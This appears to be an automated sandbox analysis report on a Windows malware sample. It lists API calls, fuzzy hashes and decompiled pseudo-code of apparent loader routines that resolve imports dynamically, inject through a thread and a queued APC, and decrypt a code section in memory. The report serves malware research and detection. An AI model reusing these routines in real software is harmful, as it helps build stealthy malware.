                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FC5B38
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC1AF1: lstrlen.KERNEL32(00000000,00000000,00FC6301,00000000,?,00FC5B47,00000000,00FC6301,?,00000000,00FC6301,00000000,038F9630), ref: 00FC1B02
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2A03: HeapFree.KERNEL32(00000000,00000000,00FC4072,00000000,?,?,00000000,?,?,?,?,?,?,00FC44AE,00000000), ref: 00FC2A0F
                                                                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FC6301,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B55
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC332F: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00FC5B61,00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC3339
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC332F: _snprintf.NTDLL ref: 00FC3397
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                                                                    • String ID: =
                                                                                                                                                                                                                                                                                    • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                                                                    • Opcode ID: 46e1ac1e93cb3e6d2090dd6bcbe6717f2ff5abc2cafe717ef82c7e423cae2f92
                                                                                                                                                                                                                                                                                    • Instruction ID: 178fd37ebc73c2d97c7ff4436f7dac5f115b273f21a3d820e91ce4c2aaa4c611
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46e1ac1e93cb3e6d2090dd6bcbe6717f2ff5abc2cafe717ef82c7e423cae2f92
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5611E33390052B2B8712B7749E87EAE7A9D9F85B64309001DF9019B102CF6CED01B7A1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00FC16B2
                                                                                                                                                                                                                                                                                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00FC1734
                                                                                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(00000000,006E0069), ref: 00FC1773
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00FC1795
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC13B4: SysAllocString.OLEAUT32(00FC92D0), ref: 00FC1404
                                                                                                                                                                                                                                                                                    • SafeArrayDestroy.OLEAUT32(?), ref: 00FC17E9
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00FC17F7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5872: Sleep.KERNELBASE(000001F4), ref: 00FC58BA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2118684380-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e52bf0b86c1769a687a47a953c24d947491bf2050adf3b6fa2e9f9900e2197a7
                                                                                                                                                                                                                                                                                    • Instruction ID: 2b8d673dd3c739b3b7f3d83c305563046a3d888c48d9ab527e29199af0e53623
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e52bf0b86c1769a687a47a953c24d947491bf2050adf3b6fa2e9f9900e2197a7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18514E3690020EEFCB00DFA4C989DAEB7B6FF89350B14896CE505EB221DB35AD55DB50
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E6E051AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t33;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t36;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t39;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t42;
                                                                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t56 = E6E051C8F(0x20);
                                                                                                                                                                                                                                                                                    				if(_t56 == 0) {
                                                                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t50 = GetModuleHandleA( *0x6e0541d0 + 0x6e055014);
                                                                                                                                                                                                                                                                                    					_v8 = 0x7f;
                                                                                                                                                                                                                                                                                    					_t29 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e0550e1);
                                                                                                                                                                                                                                                                                    					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                                                    						E6E05136A(_t56);
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t33 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e0550f1);
                                                                                                                                                                                                                                                                                    						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t36 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e055104);
                                                                                                                                                                                                                                                                                    							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                                                                                                                                    							if(_t36 == 0) {
                                                                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t39 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e055119);
                                                                                                                                                                                                                                                                                    								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                                                                                                                                    								if(_t39 == 0) {
                                                                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_t42 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e05512f);
                                                                                                                                                                                                                                                                                    									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                                                                                                                                    									if(_t42 == 0) {
                                                                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                                                                                                                                    										_t46 = E6E0518D1(_t56, _a12); // executed
                                                                                                                                                                                                                                                                                    										_v8 = _t46;
                                                                                                                                                                                                                                                                                    										if(_t46 != 0) {
                                                                                                                                                                                                                                                                                    											goto L8;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *_a16 = _t56;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}













APIs
  • Part of subcall function 6E051C8F: HeapAlloc.KERNEL32(00000000,?,6E05117D,?,00000000,00000000,?,?,?,6E051810), ref: 6E051C9B
• GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E051272,?,?,?,?,00000002,00000000,?,?), ref: 6E051AC9
• GetProcAddress.KERNEL32(00000000,?), ref: 6E051AEB
• GetProcAddress.KERNEL32(00000000,?), ref: 6E051B01
• GetProcAddress.KERNEL32(00000000,?), ref: 6E051B17
• GetProcAddress.KERNEL32(00000000,?), ref: 6E051B2D
• GetProcAddress.KERNEL32(00000000,?), ref: 6E051B43
  • Part of subcall function 6E0518D1: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6E05192E
  • Part of subcall function 6E0518D1: memset.NTDLL ref: 6E051950
Memory Dump Source
• Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
Similarity
• API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
• String ID:
• API String ID: 1632424568-0
• Opcode ID: addb383dcf0a247a8ed5d69168a07056963f7f6558a2746290e06db661af9f6a
• Instruction ID: 27570ec3e8125e34ab7f3adaa770dbf98e78e527a34629217c6a048ebf51dea6
• Opcode Fuzzy Hash: addb383dcf0a247a8ed5d69168a07056963f7f6558a2746290e06db661af9f6a
• Instruction Fuzzy Hash: 312174B5500B0AAFEB50DFA9CA90F5B7BECFF46284B004425E845D7351E734E925CBA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
    long _v8;
    void* __edi;
    void* __esi;
    void* __ebp;
    char _t9;
    void* _t10;
    void* _t18;
    void* _t23;
    void* _t36;

    _push(__ecx);
    _t9 = _a8;
    _v8 = 1;
    if(_t9 == 0) {
        _t10 = InterlockedDecrement(0x6e054188);
        __eflags = _t10;
        if(_t10 == 0) {
            __eflags =  *0x6e05418c;
            if( *0x6e05418c != 0) {
                _t36 = 0x2328;
                while(1) {
                    SleepEx(0x64, 1);
                    __eflags =  *0x6e054198;
                    if( *0x6e054198 == 0) {
                        break;
                    }
                    _t36 = _t36 - 0x64;
                    __eflags = _t36;
                    if(_t36 > 0) {
                        continue;
                    }
                    break;
                }
                CloseHandle( *0x6e05418c);
            }
            HeapDestroy( *0x6e054190);
        }
    } else {
        if(_t9 == 1 && InterlockedIncrement(0x6e054188) == 1) {
            _t18 = HeapCreate(0, 0x400000, 0); // executed
            _t41 = _t18;
             *0x6e054190 = _t18;
            if(_t18 == 0) {
                L6:
                _v8 = 0;
            } else {
                 *0x6e0541b0 = _a4;
                asm("lock xadd [eax], edi");
                _push( &_a8);
                _t23 = E6E051CA4(E6E051D32, E6E051EE0(_a12, 1, 0x6e054198, _t41));
                 *0x6e05418c = _t23;
                if(_t23 == 0) {
                    asm("lock xadd [esi], eax");
                    goto L6;
                }
            }
        }
    }
    return _v8;
}












                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e051ebc
                                                                                                                                                                                                                                                                                    0x6e051ec4
                                                                                                                                                                                                                                                                                    0x6e051ec4
                                                                                                                                                                                                                                                                                    0x6e051ed0
                                                                                                                                                                                                                                                                                    0x6e051ed0
                                                                                                                                                                                                                                                                                    0x6e051e1a
                                                                                                                                                                                                                                                                                    0x6e051e1b
                                                                                                                                                                                                                                                                                    0x6e051e3b
                                                                                                                                                                                                                                                                                    0x6e051e41
                                                                                                                                                                                                                                                                                    0x6e051e43
                                                                                                                                                                                                                                                                                    0x6e051e48
                                                                                                                                                                                                                                                                                    0x6e051e84
                                                                                                                                                                                                                                                                                    0x6e051e84
                                                                                                                                                                                                                                                                                    0x6e051e4a
                                                                                                                                                                                                                                                                                    0x6e051e52
                                                                                                                                                                                                                                                                                    0x6e051e59
                                                                                                                                                                                                                                                                                    0x6e051e63
                                                                                                                                                                                                                                                                                    0x6e051e6f
                                                                                                                                                                                                                                                                                    0x6e051e76
                                                                                                                                                                                                                                                                                    0x6e051e7b
                                                                                                                                                                                                                                                                                    0x6e051e80
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e051e80
                                                                                                                                                                                                                                                                                    0x6e051e7b
                                                                                                                                                                                                                                                                                    0x6e051e48
                                                                                                                                                                                                                                                                                    0x6e051e1b
                                                                                                                                                                                                                                                                                    0x6e051edd

APIs
• InterlockedIncrement.KERNEL32(6E054188), ref: 6E051E26
• HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E051E3B
  • Part of subcall function 6E051CA4: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E054198,6E051E74), ref: 6E051CBB
  • Part of subcall function 6E051CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E051CD0
  • Part of subcall function 6E051CA4: GetLastError.KERNEL32(00000000), ref: 6E051CDB
  • Part of subcall function 6E051CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6E051CE5
  • Part of subcall function 6E051CA4: CloseHandle.KERNEL32(00000000), ref: 6E051CEC
  • Part of subcall function 6E051CA4: SetLastError.KERNEL32(00000000), ref: 6E051CF5
• InterlockedDecrement.KERNEL32(6E054188), ref: 6E051E8E
• SleepEx.KERNEL32(00000064,00000001), ref: 6E051EA8
• CloseHandle.KERNEL32 ref: 6E051EC4
• HeapDestroy.KERNEL32 ref: 6E051ED0

Memory Dump Source
• Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp

Similarity
• API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
• String ID:
• API String ID: 2110400756-0
• Opcode ID: 47a43843629dde8e66c623ed85faae1d5f2a3c36afb7ad3f26b45cbb322401d3
• Instruction ID: 6dc3f6860c878178266abd800aee5e8ef9d0146646279f67a536916a6bf74d57
• Opcode Fuzzy Hash: 47a43843629dde8e66c623ed85faae1d5f2a3c36afb7ad3f26b45cbb322401d3
• Instruction Fuzzy Hash: 65214F71A00B05FBCB409FE9DA98B8A7BE8FB5A2A47200529F516D3248E7348925CB54

Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%

E6E051CA4(long _a4, DWORD* _a12) {
    _Unknown_base(*)()* _v0;
    void* _t4;
    long _t6;
    long _t11;
    void* _t13;

    _t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e0541cc, 0, _a12); // executed
    _t13 = _t4;
    if(_t13 != 0) {
        _t6 = QueueUserAPC(_v0, _t13, _a4); // executed
        if(_t6 == 0) {
            _t11 = GetLastError();
            TerminateThread(_t13, _t11);
            CloseHandle(_t13);
            _t13 = 0;
            SetLastError(_t11);
        }
    }
    return _t13;
}









                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E054198,6E051E74), ref: 6E051CBB
                                                                                                                                                                                                                                                                                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E051CD0
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 6E051CDB
                                                                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 6E051CE5
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6E051CEC
                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 6E051CF5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3832013932-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 47d9b66441fd24d5981991a5dde4fb77335a57c3251e412dd7b22bd2a1aabfa3
                                                                                                                                                                                                                                                                                    • Instruction ID: 9296a742ad03ee691f7f910d3cd9013dbedaeb9851969717e081b4de30d78abb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47d9b66441fd24d5981991a5dde4fb77335a57c3251e412dd7b22bd2a1aabfa3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF01237205F21BBDB125FE08E5CF5F7F69FB0E751F005404F60591155C72988259B95
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(80000002), ref: 00FC34A3
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00FC20DE), ref: 00FC34E6
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00FC34FA
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00FC3508
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 214293c7871156a2b3c931eabe7948740da5eb1d9154913739a833af168408b4
                                                                                                                                                                                                                                                                                    • Instruction ID: e9efb537d2b77c5e3663b126dd9db1bfa28d3c90ecb49bfdb18b1a141bf2a125
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 214293c7871156a2b3c931eabe7948740da5eb1d9154913739a833af168408b4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70314C7290010AEF8B05CF98DAC5DEEBBB5FF48344B24842EE50697210E7359A45EF61
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                                                                    			E6E0515A3(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				unsigned int _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t77 =  *0x6e0541b0;
                                                                                                                                                                                                                                                                                    				_t39 = E6E051A4B(_t77,  &_v20,  &_v12);
                                                                                                                                                                                                                                                                                    				_v16 = _t39;
                                                                                                                                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                                                                                                                                    					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                                                                    					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                                                                                                                                                                                                                                                    					_t78 = _t77 + _v20;
                                                                                                                                                                                                                                                                                    					_v36 = _t78;
                                                                                                                                                                                                                                                                                    					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                    					_v24 = _t46;
                                                                                                                                                                                                                                                                                    					if(_t46 == 0) {
                                                                                                                                                                                                                                                                                    						_v16 = 8;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t61 = 0;
                                                                                                                                                                                                                                                                                    						if(_t59 <= 0) {
                                                                                                                                                                                                                                                                                    							_t47 =  *0x6e0541cc;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t66 = _a4;
                                                                                                                                                                                                                                                                                    							_t50 = _t46 - _t78;
                                                                                                                                                                                                                                                                                    							_t11 = _t66 + 0x6e055137; // 0x6e055137
                                                                                                                                                                                                                                                                                    							_v28 = _t50;
                                                                                                                                                                                                                                                                                    							_v32 = _t50 + _t11;
                                                                                                                                                                                                                                                                                    							_v8 = _t78;
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                                                                    								_t19 = _t61 + 1; // 0x2
                                                                                                                                                                                                                                                                                    								_t80 = _t19;
                                                                                                                                                                                                                                                                                    								E6E051D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                                                                                                                                                                                                                                                    								_t64 = _v32;
                                                                                                                                                                                                                                                                                    								_v8 = _v8 + 0x1000;
                                                                                                                                                                                                                                                                                    								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                                                                                                                                                                                                                                                    								_t61 = _t80;
                                                                                                                                                                                                                                                                                    								 *0x6e0541cc = _t47;
                                                                                                                                                                                                                                                                                    								if(_t61 >= _t59) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t50 = _v28;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_t47 != 0x63699bc3) {
                                                                                                                                                                                                                                                                                    							_v16 = 0xc;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							memcpy(_v36, _v24, _v12);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                                                                    			}
























                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E0515F9
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E0517EC), ref: 6E05168B
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E0516A6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                                                                    • String ID: Mar 26 2021
                                                                                                                                                                                                                                                                                    • API String ID: 4010158826-2175073649
                                                                                                                                                                                                                                                                                    • Opcode ID: 1ac4e31586941b42839b5eef7a1995ac3f3b963105405e886860ef4bd8b82703
                                                                                                                                                                                                                                                                                    • Instruction ID: 0eeda2cde74c3d93092f81f949df5e8edfda03726d14f05a58b26e6fa8368cfd
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ac4e31586941b42839b5eef7a1995ac3f3b963105405e886860ef4bd8b82703
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31315E71E0060AAFDB01CFD9CA80BDEBBB9FF49304F148129D505A7345D771AA1A8B94
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                    			E00FC5988(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    				int _t46;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                                                                                                    				int _t48;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t47 = __eax;
                                                                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                                                                    				_t39 = 0;
                                                                                                                                                                                                                                                                                    				_t46 = 0; // executed
                                                                                                                                                                                                                                                                                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                                                                    				_v8 = _t26;
                                                                                                                                                                                                                                                                                    				if(_t26 < 0) {
                                                                                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    					Sleep(0xc8);
                                                                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                                                                                                                                                                    				}
